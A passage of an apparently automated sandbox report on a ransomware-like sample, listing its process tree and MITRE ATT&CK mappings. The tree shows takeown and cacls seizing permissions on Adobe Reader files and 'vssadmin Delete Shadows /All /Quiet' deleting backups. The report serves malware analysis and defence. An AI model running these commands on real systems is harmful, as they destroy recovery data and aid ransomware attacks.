    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    - Modifies file permissions
    PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:1640
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    - Modifies file permissions
    PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:1484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    - Modifies file permissions
    PID:1148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:676
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:1544
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:1388
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:936
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:1108
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    - Modifies file permissions
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:1732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:900
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:752
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    - Modifies file permissions
    PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:660
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    - Modifies file permissions
    PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      PID:1468
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:744
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:1092
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    PID:336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:2020

C:\Windows\system32\taskeng.exe
taskeng.exe {961FEB21-5EF7-44F0-94EF-90AA33219891} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]
1⤵
PID:1188
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\yGF1qmWm.bat"
  2⤵
  PID:1844
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1380

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:636

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1624-55-0x0000000076641000-0x0000000076643000-memory.dmp

Filesize
8KB

Download
memory/1984-62-0x0000000002360000-0x0000000002FAA000-memory.dmp

Filesize
12.3MB

Download